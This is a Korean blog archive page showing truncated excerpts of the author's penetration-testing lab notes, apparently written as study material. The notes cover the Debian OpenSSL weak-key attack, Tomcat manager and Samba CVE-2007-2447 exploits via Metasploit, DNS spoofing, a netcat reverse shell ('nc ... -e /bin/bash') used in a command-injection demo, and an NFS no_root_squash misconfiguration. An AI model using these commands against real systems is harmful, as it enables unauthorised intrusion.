일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | |||||
3 | 4 | 5 | 6 | 7 | 8 | 9 |
10 | 11 | 12 | 13 | 14 | 15 | 16 |
17 | 18 | 19 | 20 | 21 | 22 | 23 |
24 | 25 | 26 | 27 | 28 | 29 | 30 |
- 앱
- textfield
- LifeCycle
- viewmodel
- Navigation
- 테스트
- android
- appbar
- binding
- Button
- data
- 앱바
- drift
- scroll
- ScrollView
- Coroutines
- Flutter
- 계측
- CustomScrollView
- tabbar
- livedata
- DART
- Kotlin
- 안드로이드
- activity
- Compose
- TEST
- intent
- textview
- Dialog
- Today
- Total
목록전체 글 (346)
Study Record
자주 사용되는 함수 ※ 참고 사이트 : http://forum.falinux.com/zbxe/index.php?document_srl=408400 int setreuid(uid_t ruid, uid_t euid) -> RUID / EUID 변경 int execl(const char* path, const char* arg); -> 현재 쉘에서 사용된다. int execv(const char* path, const char* arg[]) ☞ 공유 메모리(shmget , shmat, shmdt) https://laustudy.tistory.com/67 ☞ exit() #include void exit(int status); /* 커널에서 종료작업을 실행한다. status : 상태 코드 */ ☞ printf(..
1. 개요 Debian 기반의 OS에 OpenSSL 0.9.8c-1 버전부터 0.9.8g-9 이전 버전까지는 예측가능한 숫자를 가지고 생성하여 사용한다. 이런경우에는 쉽게 무작위 추측 공격을 통해 암호화 키에 대한 원격 공격이 가능하다. 무작위 공격을 위해 공격 가능성이 높은 ssh private/public 키 쌍의 묶음 파일을 다운로드하여 공격한다. 2. 실습 ☞ ssh private/public 키 쌍의 묶음 파일을 다운로드 공격 가능성이 높은 ssh private/public 키 쌍의 묶음 파일을 다운로드한다. # wget --no-check-certificate \ https://github.com/offensive-security/exploit-database-bin-sploits/raw/ma..
1. 개요 Tomcat 버전 5.x 에서기본 페이지를 사용할 경우 생기는 취약점을 알아본다. - (msfconsole) auxiliary/scanner/http/tomcat_mgr_login - (msfconsole) use exploit/multi/http/tomcat_mgr_deploy 2. 공격 실습 공격자(KaliLiux) : 192.168.10.50 공격 대상(metasploitable) : 192.168.10.141 [KaliLinux] ① 공격대상 시스템에 스캐닝을 시도하여 취약한 samba 서비스를 사용하고 있는 것을 확인한다. # nmap -sV -O 192.168.10.141 ② Apache Tomcat 를 사용하고 있는 사이트에 접속한다. # firefox http://192.168...
※ samba port : 137-139 , 445 Samba Arbitrary Command Execution (CVE 2007-2447) 1. 관리자의 잘못된 설정 + 버그가 존재하는 취약점 MS-RPC 기능을 사용하는 Samba 3.0.0 버전에서 3.0.25rc3 사이의 smbd는 원격 공격자가 (1)SamrChangePassword 함수와 관련된 쉘 메타문자를 사용하여 임의의 명령어를 실행할 수 있으며, "username map script" 옵션이 활성화 되어 있는 경우, 인증된 원격 사용자가 (2)원격프린터 및 (3)파일 공유 관리에 관련한 다른 MS-RPC 기능을 이용하여 쉘 메타 문자를 통한 명령 실행을 할 수 있다. 근본적인 원인은 smb.conf에 정의된 외부 스크립트를 호출할 때 M..
1. DNS Spooging 이란? ☞ DNS 서버로 보내는 질문을 가로채서 변조된 결과를 보내주는 것으로 일종의 중간자 공격이다. 2. 실습 개요 ㉮ 공격자는 가짜 사이트를 구축하고 자신의 dns 서버에 등록한다. ㉯ 공격자는 arpspoofing 을 통해 공격대상 시스템이 통신할 때 공격자를 통하도록 한다. ㉰ 공격 대상 시스템이 사이트에 대한 요청을 하면 공격자는 가짜 사이트에 대한 IP를 알려준다. ㉱ 공격 대상 시스템은 공격자가 만든 가짜 사이트로 접속하게 된다. 공격자 : kaliLinux (192.168.20.50) 공격 대상 : Window 2008 (192.168.20.201) 방화벽/라우터 : Linux (192.168.20.100) 3. 실습 과정 [kaliLinu..
Command Injection : 코드를 주입해서 원하는 동작을 실행할 수 있다. nc CMD listener (192.168.10.50) ← server (192.168.10.134) # nc -l -p 7979 # nc 192.168.10.50 7979 -e /bin/bash → listener 쪽에서 server 쪽의 명령어를 입력할 수 있다. server 쪽에서 명령어를 보내도 listener에서는 반응을 하지 않는다. listener (192.168.10.50) ← server (192.168.10.134) # nc -l -p 7979 -e /bin/bash # nc 192.168.10.50 7979 → server 쪽에서 listener 쪽의 명령어를 입력할 수 있다. listener 쪽에서..
1. NFS 전체 공유 취약점 NFS, CIFS/SMB 리눅스 시스템에서 CIFS/SMB 프로토콜을 지원하기 위한 프로그램 => samba software NFS(Network File System) : Linux 공유 자원을 Linux 클라이언트가 사용하기 위한 파일시스템 ☞ 잘못된 설정 # cat /mnt/nfs/etc/exports / *(rw,sync,no_root_squash,no_subtree_check) - no_root_squash 옵션은 클라이언트에서 사용자 root로 공유 디렉토리에 접근 시 NFS 서버 시스템에서도 사용자 root로 인식하고 권한을 부여함을 의미한다. 이 옵션이 설정되어 있으면 안된다. - 전체 공유 (/*) 를 설정하면 안된다. ☞ 실습 NFS 서비스 확인 # nma..
System V BSD Secure 원격 접속 telnet rlogin, rsh ssh 파일 전송 ftp rcp sftp, scp rCMD(rlogin, rsh, rcp), sCMD(ssh, scp, sftp) rlogin(Remote Login: 513/TCP), rsh(Remote Shell: 514/TCP), rcp(Remote Copy: 512/TCP) rlogin -> ssh, rsh -> ssh, rcp -> scp, ftp -> sftp telnet : 인증 (ID / PASS) rlogin : /etc/hosts.equiv(모든 사용자, 관리자가 만든다.) , ~/.rhosts(특정 사용자, 사용자가 만든다.) ex) ~root/.rhosts : root 사용자로 인증 가능 HostA ro..